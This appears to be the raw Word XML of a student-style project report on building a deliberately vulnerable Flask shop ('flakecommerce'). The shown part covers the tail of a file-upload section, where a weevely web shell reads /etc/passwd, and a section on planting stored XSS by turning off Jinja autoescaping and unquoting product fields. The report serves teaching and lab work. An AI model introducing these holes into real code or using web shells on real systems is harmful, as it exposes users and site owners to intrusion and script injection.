          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63E731EE" wp14:editId="285149CE">
            <wp:extent cx="5435600" cy="3606800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>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35600" cy="3606800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F08EC16" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Here we see an audit of the /etc/passwd file using weevely.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4508"/>
        <w:gridCol w:w="4508"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F22AF0" w:rsidRPr="00B90A7E" w14:paraId="14302C2A" w14:textId="77777777" w:rsidTr="00CE3195">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3455C7C2" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRPr="00B90A7E" w:rsidRDefault="00F22AF0" w:rsidP="00CE3195">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00B90A7E">
              <w:t>Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59DD270E" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRPr="00B90A7E" w:rsidRDefault="00F22AF0" w:rsidP="00CE3195">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>audit_etcpasswd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="171B0633" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0"/>
    <w:p w14:paraId="02C99C30" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRPr="00926E24" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="613323EA" wp14:editId="7F37A0E5">
            <wp:extent cx="5632450" cy="2063750"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>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32450" cy="2063750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B797FC2" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRPr="00A40517" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A40517">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OUTCOME:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E41D09" w14:textId="14246DBA" w:rsidR="00EA351B" w:rsidRPr="002E43AE" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:t xml:space="preserve">Upon successful completion of the exploit, functionality testing was again successfully conducted to ensure no issues had arisen in the site by the implementation of this exploit. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DD74A2" w14:textId="1964A394" w:rsidR="00F22AF0" w:rsidRPr="00A40517" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A40517">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>REVIEWED BY:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D03E07" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:t>FILE UPLOAD – Tm Drummond</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE8377C" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRPr="00A40517" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A40517">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>REVIEW OUTCOME:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A55894" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:t xml:space="preserve">Successful </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59441003" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRPr="00926E24" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0"/>
    <w:p w14:paraId="55B8536D" w14:textId="77777777" w:rsidR="00384B9F" w:rsidRDefault="00384B9F" w:rsidP="00384B9F"/>
    <w:p w14:paraId="18A97B43" w14:textId="77777777" w:rsidR="00384B9F" w:rsidRDefault="00384B9F" w:rsidP="00384B9F"/>
    <w:p w14:paraId="060FA147" w14:textId="77777777" w:rsidR="002E43AE" w:rsidRDefault="002E43AE" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54A3EC7B" w14:textId="77777777" w:rsidR="002E43AE" w:rsidRDefault="002E43AE" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26D0E95B" w14:textId="77777777" w:rsidR="002E43AE" w:rsidRDefault="002E43AE" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C17AAB2" w14:textId="77777777" w:rsidR="002E43AE" w:rsidRDefault="002E43AE" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05143BFE" w14:textId="77777777" w:rsidR="002E43AE" w:rsidRDefault="002E43AE" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7545F535" w14:textId="77777777" w:rsidR="002E43AE" w:rsidRDefault="002E43AE" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F012A47" w14:textId="77777777" w:rsidR="002E43AE" w:rsidRDefault="002E43AE" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61FAAE29" w14:textId="77777777" w:rsidR="002E43AE" w:rsidRDefault="002E43AE" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18AC5833" w14:textId="77777777" w:rsidR="002E43AE" w:rsidRDefault="002E43AE" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C7654C4" w14:textId="77777777" w:rsidR="002E43AE" w:rsidRDefault="002E43AE" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EAD41D5" w14:textId="77777777" w:rsidR="002E43AE" w:rsidRDefault="002E43AE" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D59B2FE" w14:textId="77777777" w:rsidR="002E43AE" w:rsidRDefault="002E43AE" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A06B208" w14:textId="77777777" w:rsidR="002E43AE" w:rsidRDefault="002E43AE" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="086D03CA" w14:textId="35347F5C" w:rsidR="00384B9F" w:rsidRPr="00CA3121" w:rsidRDefault="00384B9F" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA3121">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>VULNERABILITY 3: XSS (M)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200BE929" w14:textId="64205E04" w:rsidR="00384B9F" w:rsidRPr="00CA3121" w:rsidRDefault="00384B9F" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA3121">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">RESEARCH AND DEVELOPMENT:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0856F7B4" w14:textId="3816B7B8" w:rsidR="00384B9F" w:rsidRDefault="00384B9F" w:rsidP="00384B9F">
      <w:r>
        <w:t>Pawel Wilkowski</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6977E8" w14:textId="77777777" w:rsidR="00384B9F" w:rsidRPr="00CA3121" w:rsidRDefault="00384B9F" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA3121">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RESEARCH UNDERTAKEN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6829A5A4" w14:textId="3892540A" w:rsidR="00384B9F" w:rsidRDefault="00384B9F" w:rsidP="00384B9F">
      <w:r>
        <w:t xml:space="preserve">XSS vulnerability is based on lack of sanitization in the website html code. So, the easiest way to make </w:t>
      </w:r>
      <w:r w:rsidR="00EE18F4">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r>
        <w:t>website vulnerable to XSS attack is to disable it on the pages with want to be exploitable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C484C8" w14:textId="633630F0" w:rsidR="00384B9F" w:rsidRDefault="00EE18F4" w:rsidP="00384B9F">
      <w:r>
        <w:t>we</w:t>
      </w:r>
      <w:r w:rsidR="00384B9F">
        <w:t xml:space="preserve"> managed to get all the information on that from the following website:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E26BE54" w14:textId="517C2853" w:rsidR="00384B9F" w:rsidRDefault="00DF7185" w:rsidP="00384B9F">
      <w:hyperlink r:id="rId102" w:history="1">
        <w:r w:rsidR="00384B9F" w:rsidRPr="00ED3AFE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://semgrep.dev/docs/cheat-sheets/flask-xss/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1F6075E8" w14:textId="3100514A" w:rsidR="00384B9F" w:rsidRDefault="00384B9F" w:rsidP="00384B9F">
      <w:r>
        <w:t>The exploit itself will allow injecting website with malicious code, that will be run on machine of any user running the website. All the information on this was found on the following website:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52981381" w14:textId="3DDC8451" w:rsidR="00384B9F" w:rsidRDefault="00DF7185" w:rsidP="00384B9F">
      <w:hyperlink r:id="rId103" w:history="1">
        <w:r w:rsidR="00384B9F" w:rsidRPr="00ED3AFE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.softwaretestinghelp.com/cross-site-scripting-xss-attack-test/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2F312DFB" w14:textId="77777777" w:rsidR="00384B9F" w:rsidRPr="00CA3121" w:rsidRDefault="00384B9F" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA3121">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SUGGESTED IMPLEMENTATION METHOD:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBDC22A" w14:textId="0638E2DF" w:rsidR="00384B9F" w:rsidRDefault="00384B9F" w:rsidP="00384B9F">
      <w:r>
        <w:t>Edit the chosen template of the web page you want to make vulnerable. It is important that there is a way for a user to add something to the page you want vulnerable. The best choice</w:t>
      </w:r>
      <w:r w:rsidR="0018174B">
        <w:t xml:space="preserve"> here</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is to edit </w:t>
      </w:r>
      <w:r w:rsidR="0018174B">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:t>main page displaying all the products, as users should be able add their own products.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CE7FC6" w14:textId="59F584CD" w:rsidR="00384B9F" w:rsidRDefault="00384B9F" w:rsidP="00384B9F">
      <w:r>
        <w:tab/>
        <w:t>1. Find the template at ~/flakecommerce/shop/templates/products/index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B08C9D1" w14:textId="69DED82F" w:rsidR="00384B9F" w:rsidRDefault="00384B9F" w:rsidP="00384B9F">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">2. Open it using text editor and add {% autoescape false %} in line below {% block content %} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25187B43" w14:textId="455FA9CD" w:rsidR="00ED3AFE" w:rsidRDefault="00ED3AFE" w:rsidP="00384B9F">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CD6BE4A" wp14:editId="394273C2">
            <wp:extent cx="5730875" cy="2280285"/>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0875" cy="2280285"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F81EA55" w14:textId="5AF03EB3" w:rsidR="00384B9F" w:rsidRDefault="00384B9F" w:rsidP="00384B9F">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">3. Add {% endautoescape %} at the end of the file, right before {% endblock content %} This should turn off </w:t>
      </w:r>
      <w:r w:rsidR="00ED3AFE">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>any code sanitation on this template.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA23078" w14:textId="6518220A" w:rsidR="00ED3AFE" w:rsidRDefault="00ED3AFE" w:rsidP="00384B9F">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D85A372" wp14:editId="5F15DEFB">
            <wp:extent cx="5212715" cy="1713230"/>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12715" cy="1713230"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="260798DF" w14:textId="0C9D24F7" w:rsidR="00384B9F" w:rsidRDefault="00ED3AFE" w:rsidP="00384B9F">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00384B9F">
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00384B9F">
        <w:t xml:space="preserve">Last thing that needs to be done is getting rid of quotation signs around any variables that are used to </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00384B9F">
        <w:t xml:space="preserve">display information about the products.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039FCF08" w14:textId="3E48888A" w:rsidR="00ED3AFE" w:rsidRDefault="00ED3AFE" w:rsidP="00384B9F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44E352E9" wp14:editId="7CC92B55">
            <wp:extent cx="5231130" cy="219710"/>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32678" cy="219775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C805C43" w14:textId="7FAAEA6C" w:rsidR="00384B9F" w:rsidRDefault="00ED3AFE" w:rsidP="00384B9F">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00384B9F">
        <w:t>The variables that we want to focus on are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33602120" w14:textId="2B95C14A" w:rsidR="00384B9F" w:rsidRDefault="00384B9F" w:rsidP="00C31234">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>b.name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E3979A" w14:textId="2A66A2AD" w:rsidR="00384B9F" w:rsidRDefault="00384B9F" w:rsidP="00C31234">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>b.id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3BB3A7" w14:textId="1B0E4285" w:rsidR="00384B9F" w:rsidRDefault="00384B9F" w:rsidP="00C31234">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>col[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C67FD29" w14:textId="6D7490C6" w:rsidR="00384B9F" w:rsidRDefault="00384B9F" w:rsidP="00C31234">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>get_cat.name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C67F285" w14:textId="71ECD0AE" w:rsidR="00384B9F" w:rsidRDefault="00384B9F" w:rsidP="00C31234">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>get_cat.id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACFD659" w14:textId="7AB98095" w:rsidR="00384B9F" w:rsidRDefault="00384B9F" w:rsidP="00C31234">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>product.name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525EDBE3" w14:textId="198CF0C2" w:rsidR="00384B9F" w:rsidRDefault="00384B9F" w:rsidP="00C31234">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>product.id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C267F37" w14:textId="77777777" w:rsidR="00384B9F" w:rsidRDefault="00384B9F" w:rsidP="00384B9F">
      <w:r>
        <w:t xml:space="preserve">The more variables are desensitized the more possible exploitation angles there will be, but those are the essential ones. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEB1C1A" w14:textId="77777777" w:rsidR="00384B9F" w:rsidRPr="00CA3121" w:rsidRDefault="00384B9F" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA3121">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>FUNCTIONALITY TESTING:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDB2E96" w14:textId="0A618354" w:rsidR="00384B9F" w:rsidRDefault="00384B9F" w:rsidP="00384B9F">
      <w:r>
        <w:t>To test the exploit, I started with adding</w:t>
      </w:r>
      <w:r w:rsidR="0018174B">
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> new product </w:t>
      </w:r>
      <w:r w:rsidR="0018174B">
        <w:t xml:space="preserve">containing the </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">code to </w:t>
      </w:r>
      <w:r w:rsidR="0018174B">
        <w:t xml:space="preserve">be </w:t>
      </w:r>
      <w:r>
        <w:t>inject</w:t>
      </w:r>
      <w:r w:rsidR="0018174B">
        <w:t>ed</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F649AD" w14:textId="4D673D07" w:rsidR="00ED3AFE" w:rsidRDefault="00ED3AFE" w:rsidP="00384B9F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28BDB4F4" wp14:editId="72F1DBB6">
            <wp:extent cx="5730875" cy="28448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0875" cy="2844800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5673ED" w14:textId="2DE8ACEE" w:rsidR="0018174B" w:rsidRPr="002E43AE" w:rsidRDefault="00384B9F" w:rsidP="00384B9F">
      <w:r>
        <w:t xml:space="preserve">The code should </w:t>
      </w:r>
      <w:r w:rsidR="0018174B">
        <w:t>present</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> an alert displaying number 1, when displaying this product on the index page if everything is working as expected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4879C6" w14:textId="6BEE483E" w:rsidR="00384B9F" w:rsidRPr="00CA3121" w:rsidRDefault="00384B9F" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA3121">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OUTCOME:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D74A76D" w14:textId="77777777" w:rsidR="00384B9F" w:rsidRDefault="00384B9F" w:rsidP="00384B9F">
      <w:r>
        <w:t>Now when you go to the main page the script we injected is being run by the user. All it’s doing right now is displaying an alert, but it could be running any JavaScript code an attacker can come up with.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F47DC3C" w14:textId="1717DEF8" w:rsidR="00384B9F" w:rsidRDefault="00384B9F" w:rsidP="00384B9F">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED3AFE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47B04905" wp14:editId="49EAE65D">
            <wp:extent cx="4724400" cy="215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24400" cy="2159000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C31E8FA" w14:textId="53945F91" w:rsidR="0018174B" w:rsidRPr="002E43AE" w:rsidRDefault="00384B9F" w:rsidP="00B56C0A">
      <w:r>
        <w:t>All other pages are still working as expected and if the script wouldn’t be an alert, user couldn’t see any difference.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53159FFA" w14:textId="7BABE30A" w:rsidR="00B56C0A" w:rsidRPr="00B56C0A" w:rsidRDefault="00CA3121" w:rsidP="00B56C0A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">XSS </w:t>
      </w:r>
      <w:r w:rsidR="00B56C0A" w:rsidRPr="00B56C0A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>VULNERABILITY/EXPLOIT WALKTHROUGH:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434C5559" w14:textId="77777777" w:rsidR="00C31234" w:rsidRDefault="00B56C0A" w:rsidP="00C31234">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B56C0A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TOOLS REQUIRED:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB36E57" w14:textId="77777777" w:rsidR="00C31234" w:rsidRDefault="00B56C0A" w:rsidP="00C31234">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B56C0A">
        <w:t>Text editor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4416DCCA" w14:textId="722D44C0" w:rsidR="00B56C0A" w:rsidRPr="00C31234" w:rsidRDefault="00B56C0A" w:rsidP="00C31234">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
